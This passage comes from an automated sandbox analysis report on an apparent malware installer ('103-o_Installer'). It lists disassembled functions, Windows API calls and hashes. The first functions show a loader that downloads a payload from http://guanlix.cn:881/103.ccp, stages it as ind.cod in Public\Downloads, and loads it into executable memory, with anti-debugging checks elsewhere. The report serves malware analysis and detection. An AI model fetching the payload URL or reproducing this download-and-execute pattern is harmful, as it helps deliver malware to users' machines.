Part of subcall function 003A2E58: InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
Part of subcall function 003A2E58: InternetCloseHandle.WININET(?), ref: 003A2F12
Part of subcall function 003A2E58: InternetCloseHandle.WININET(?), ref: 003A2F2A

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 003A2F6F

Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A169D
Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16B5
Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16CD
Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16E5

Part of subcall function 003A11E1: GetTickCount64.KERNEL32 ref: 003A11EF
Part of subcall function 003A11E1: Sleep.KERNEL32(0000012C), ref: 003A11F9
Part of subcall function 003A11E1: GetTickCount64.KERNEL32 ref: 003A11FF
Part of subcall function 003A11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003A1244
Part of subcall function 003A11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 003A124E
Part of subcall function 003A11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003A125F
Part of subcall function 003A11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1270
Part of subcall function 003A11E1: CloseHandle.KERNEL32(00000000), ref: 003A1277

Strings

C:\Users\Public\Downloads\ind.cod, xrefs: 003A2F54
http://guanlix.cn:881/103.ccp, xrefs: 003A2F59

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/103.ccp
API String ID: 2148924518-3633230328
Opcode ID: a6c4e1eea04216d24a50beafbd3d269a32f73ce50b3ead7f092ced8335168522
Instruction ID: 89b262c776094fdedd258003c2f2fb852695d9290b4399effbc97ea011e32565
Opcode Fuzzy Hash: a6c4e1eea04216d24a50beafbd3d269a32f73ce50b3ead7f092ced8335168522
Instruction Fuzzy Hash: 4CE017723887647AF663B3B46C0BFEA161CDB02B55F224512F700AD0D2D9D869829669

Function 02EDFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02EDFB8F
LoadLibraryA.KERNEL32(00000238), ref: 02EDFC2C

Memory Dump Source

Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 465bc843112d824c6fb84fd8e4df54c03d5c9eef9b534100fa567c8c25db8938
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: 8F61D472581B02ABCB31ABA0CC80B9BB3EAFF05318F14A919F55B59850DB31F592CF55

Function 003A5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003AA95F: __getptd_noexit.LIBCMT ref: 003AA95F

__lock_file.LIBCMT ref: 003A5949

Part of subcall function 003A50E4: __lock.LIBCMT ref: 003A5109

__fclose_nolock.LIBCMT ref: 003A5954

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 76495a132248f9ebb727d5fdc8a187c444e19a4d98b744458fc94e9216b11e49
Instruction ID: 4895a31c701652e145571492a6cae311c35c8e8f98608f54f69321cd6b97ce46
Opcode Fuzzy Hash: 76495a132248f9ebb727d5fdc8a187c444e19a4d98b744458fc94e9216b11e49
Instruction Fuzzy Hash: 79F06D31801F09DADB12AB64880679F7BA4EF13335F26820DE475AE0C1CB7C4A01DA96

Function 053A75E0 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728cb2bb5d8cf4e12d74d75a0ff8cddc6e309d26d8b6d4036e4e7004444eb9e8
Instruction ID: f220f68c64342c77d48b01d2f3a274e4c30642c4a61953050180b2aa2370f7c6
Opcode Fuzzy Hash: 728cb2bb5d8cf4e12d74d75a0ff8cddc6e309d26d8b6d4036e4e7004444eb9e8
Instruction Fuzzy Hash: 9E412332D043598FCB14DFB9D8447AEBBF1EF89210F15856AD444E7290DB789845CBD1

Function 003A184B Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A18A8

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction ID: bb59f503b7ec17bad840b32ec8a34f7a30f84d8470fee1d32fe4f234bdd59f22
Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction Fuzzy Hash: 9D315936900619EFCB52CF59C84459EB7B9FF0A365F15826AF8249B191E378DE50CF80

Function 053A6FC9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f58b43620c55a7354f0f63264f2e964f5d675240f84bc37f9660d6811ce0f0a2
Instruction ID: 3d0fd1f325ceb56f75491cd24bd5798e8b0ddb405259885560fd97231cd00d9e
Opcode Fuzzy Hash: f58b43620c55a7354f0f63264f2e964f5d675240f84bc37f9660d6811ce0f0a2
Instruction Fuzzy Hash: C92148B2C0465ADFDB14CFA9C444BEAFBF4FF48310F14816AD818A7640D778A510CBA5

Function 053A6F50 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 328159fbf82039d1cfd13b4defed4065a44b29598e1499ce0cbc4b6ba4ac3f17
Instruction ID: fe18696b0b3af878bb61edca9fa9bfabb4a8a8585d80ffe82ca00faf947c18a5
Opcode Fuzzy Hash: 328159fbf82039d1cfd13b4defed4065a44b29598e1499ce0cbc4b6ba4ac3f17
Instruction Fuzzy Hash: 58215772C002699FDB10CFAAD444BEEBBF4EF48320F14816AD818A7240D378A944CFE5

Function 003A2D2E Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A2D33

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 93b32d0f9eb96bfa11150be65644f8c27e0327d80d3da4f3cf827c9f8e83c8c6
Instruction ID: 8fc5b84800db283e3648f1f3fdf1035fd42a2c1b252d9e50c3e8531b2c59c9bd
Opcode Fuzzy Hash: 93b32d0f9eb96bfa11150be65644f8c27e0327d80d3da4f3cf827c9f8e83c8c6
Instruction Fuzzy Hash: ED112BB5A10254AFDB22DF98C885AABFBE9FB55708F00881EF5569B241C7B19D00CB60

Function 003A2D33 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A2D33

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8b5d8f2100c52a90b9dfd566db9a639c9a08fa237d56727512d57367e52ef726
Instruction ID: 152f17392952c2a90a4e8b2b9e17650bf99e4d5770ff1504d0015016ce8262d2
Opcode Fuzzy Hash: 8b5d8f2100c52a90b9dfd566db9a639c9a08fa237d56727512d57367e52ef726
Instruction Fuzzy Hash: 9A113DB5A10254AFDB22DF98C885AAFFBF9FB55708F00881EF5569B241C7B19D00CB60

Function 053A76B0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7467cbf2ee38c86e24a4541c6b2733ee528ed38da0e0803dbbd001c2905c6ecd
Instruction ID: 666e272b6fe35b583a642d82bec7eca142b8cb65e58275771485e146b5c905d4
Opcode Fuzzy Hash: 7467cbf2ee38c86e24a4541c6b2733ee528ed38da0e0803dbbd001c2905c6ecd
Instruction Fuzzy Hash: BA1117B2C00659DFDB10CF9AD4487EEFBF4EF48220F15812AD818A7640D7789945CFA5

Function 053A6F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,053A7632), ref: 053A771F

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e8b36b1e2c09a7e5efc2127ce58a200d759cbc7a2f7945286af7d02e05fdc59e
Instruction ID: 3057178b91b9064c4ed6ce7045ff1183ac1437ed45ba32c01c6bab8ba49e59f5
Opcode Fuzzy Hash: e8b36b1e2c09a7e5efc2127ce58a200d759cbc7a2f7945286af7d02e05fdc59e
Instruction Fuzzy Hash: 7D1106B2C006599BDB10CF9AC448BDEFBF4EB48210F14812AE818A7240D779A944CFE5

Function 003A2488 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A2488

Part of subcall function 003A130B: std::locale::facet::_Incref.LIBCPMT ref: 003A131E

Part of subcall function 003A235F: __EH_prolog.LIBCMT ref: 003A2364
Part of subcall function 003A235F: std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
Part of subcall function 003A235F: int.LIBCPMT ref: 003A238A

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction ID: 691f7f38ba7859b299966ca766cd886065e25beb5a8fedec573b7e6d46f46231
Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction Fuzzy Hash: A8F0B476640114AFCF27EF68CC02BAF33A9EF1A710F014019F806DA595DBB8CA50D750

Function 003A2483 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A2488

Part of subcall function 003A130B: std::locale::facet::_Incref.LIBCPMT ref: 003A131E

Part of subcall function 003A235F: __EH_prolog.LIBCMT ref: 003A2364
Part of subcall function 003A235F: std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
Part of subcall function 003A235F: int.LIBCPMT ref: 003A238A

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 2c31da9c778f7f052342bc769268b0057061c63bd2cb6b6b9c30ac053dbf6e21
Instruction ID: 42d861042c3b0704ed992a352d36bce753a1b8a2a77007e5999c84af3904679d
Opcode Fuzzy Hash: 2c31da9c778f7f052342bc769268b0057061c63bd2cb6b6b9c30ac053dbf6e21
Instruction Fuzzy Hash: 5DF09076640114AFCF27EF58CC02BEF33A9EF1A710F014029F906DA595DBB88A50C750

Function 02F2D5FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202008545b6bd288c45fc2ecf5a2db0e6a6c67633e86aff596d4d0cd14a84b4b
Instruction ID: 69a00532ce822a0353b59257afc2a90210fb875834da25a74f5361f212b40978
Opcode Fuzzy Hash: 202008545b6bd288c45fc2ecf5a2db0e6a6c67633e86aff596d4d0cd14a84b4b
Instruction Fuzzy Hash: 18214572A04200DFDB14DF10D9C0B26BF61FB89354F208569EA0D0F256C336D45ACEA2

Function 02F2D5F7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89eb31c3110daae1841cdb4c2502750ab687cb1a1c3cb8c6f5202d9724c4c84
Instruction ID: a411427640f3f390278877445a531481d8fc9f21789cd9609ec85fbfc04a4eee
Opcode Fuzzy Hash: d89eb31c3110daae1841cdb4c2502750ab687cb1a1c3cb8c6f5202d9724c4c84
Instruction Fuzzy Hash: 5811B176904244DFDB15CF10D5C4B16BF62FB84314F24C5A9D9490F656C336D45ACFA2

Function 02F2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0500b788a3b6c784b534e572cf1603cd546ec9933b47bdfe54bb7a20a690fbda
Instruction ID: 42d5447a0a8b9cfa582885a6318834ddd51d11c6646e529b9e7ca0c64c05ef0d
Opcode Fuzzy Hash: 0500b788a3b6c784b534e572cf1603cd546ec9933b47bdfe54bb7a20a690fbda
Instruction Fuzzy Hash: 3C01D0315043509FF720CF25CD84757BBD8DF42AA4F18C55AEE484F296C3799949CAB2

Function 02F2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3671437724.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f2d000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7ca81d7d71d39daacc3fb9a2ab971c2c2f357d8c3bbef618f61db310831236
Instruction ID: fd0c69edcb24e844c0cbac04147b806b455b404b3d101fcf291f8fcb5ea5debc
Opcode Fuzzy Hash: ac7ca81d7d71d39daacc3fb9a2ab971c2c2f357d8c3bbef618f61db310831236
Instruction Fuzzy Hash: 7B018C2240E3C09EE7128B258894B52BFB4DF43624F0980CBD9888F2A7C2695849C772

Non-executed Functions

Function 003A65D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 003AE003
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003AE018
UnhandledExceptionFilter.KERNEL32(003BAEF0), ref: 003AE023
GetCurrentProcess.KERNEL32(C0000409), ref: 003AE03F
TerminateProcess.KERNEL32(00000000), ref: 003AE046

Strings

'l, xrefs: 003ADFF8

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 'l
API String ID: 2579439406-482238870
Opcode ID: 8451f5fb3d9531b2b7919403e204da8f7cbafa38fe7ebf8113ab226213a5a735
Instruction ID: 4688aaeda229d3a9ce22bfcaf1202158db66c7c0f4ac34c4f6bde53a13a5287c
Opcode Fuzzy Hash: 8451f5fb3d9531b2b7919403e204da8f7cbafa38fe7ebf8113ab226213a5a735
Instruction Fuzzy Hash: 5B21E6789103809FD713EF55EC84A843BF8FB4A74CF10115AEA04C6A62E7B065809F05

Function 003AF4CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003AF50C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003AF535
GetACP.KERNEL32(?,?,003AFB0A,?,003A6AFC,?,000000BC,?,00000001,00000000), ref: 003AF549

Strings

OCP, xrefs: 003AF4ED
ACP, xrefs: 003AF4DC

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4a0f40cb9dd37c4964b3edc033f9473c6b8452667824bc3f7918498cd553d2aa
Instruction ID: 0940e81cfc7e745c4f93418493e4d4287a5b2b9259befe2b9f7dd325f9992eff
Opcode Fuzzy Hash: 4a0f40cb9dd37c4964b3edc033f9473c6b8452667824bc3f7918498cd553d2aa
Instruction Fuzzy Hash: 6801D431A01607BEEB17AFA5BC06B9E77A8EF0339CF114125F201E1480DF60DE419658

Function 053A07A0 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

$q, xrefs: 053A07B6

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 20bba182e73d1899ccca1e05d996a8951c9bb2b9b3ba784ea9ab78146d4dc6c6
Instruction ID: 881b82f003883e8ff5c750c45cca5a2863e5596d8f502f8ed26e4a031b4a158a
Opcode Fuzzy Hash: 20bba182e73d1899ccca1e05d996a8951c9bb2b9b3ba784ea9ab78146d4dc6c6
Instruction Fuzzy Hash: F5814035F052189BDB5CDFB5985976E7BBBBBC8310B04C52DE406EB388DE3598028791

Function 003AC78D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 003AC792

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94e371c8bd2e1a33598f3fa28b566f46cbc102d004e23afb3b42b7e592709f16
Instruction ID: 76ef6598d0d41d87b8dca59b1469963955ed292c6261e5e339479e8b8cbaaf36
Opcode Fuzzy Hash: 94e371c8bd2e1a33598f3fa28b566f46cbc102d004e23afb3b42b7e592709f16
Instruction Fuzzy Hash: 319002B02615004A470327745E0AA8535959B6970AB421551A341C4054DB9145005952

Function 053A49C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vhm, xrefs: 053A4C0B

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: \Vhm
API String ID: 0-1451868494
Opcode ID: 7190b8294b5eb2190bc57754608fca899f43afcd407892ac1a5316ca08594708
Instruction ID: 75487d13f007b62cc0a8ef2abe7260636743cbd6872f6059031a2f28279965f6
Opcode Fuzzy Hash: 7190b8294b5eb2190bc57754608fca899f43afcd407892ac1a5316ca08594708
Instruction Fuzzy Hash: 50914C71E003099FDF14CFA8D9847ADBBF2FF88314F148129D419A7294EBB49845CB85

Function 003B0BD6 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: d6f3e8178c88bfa5afbbac97805641c4bd091dba8a38eb9946d396976a5ff974
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 89C1B473D0A9F2498B3B452E44183BFEE626E81B8831FC395DED43F999C627AD0195D0

Function 003B07EE Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 00208d29992e8559afa86a90a9c0351e77f58fc58aea0b00a2731e66495d0714
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 2FC1A273D0A5F249873B852D44182BFEE626E81B8831FC391DED43F999C627AD01D6D0

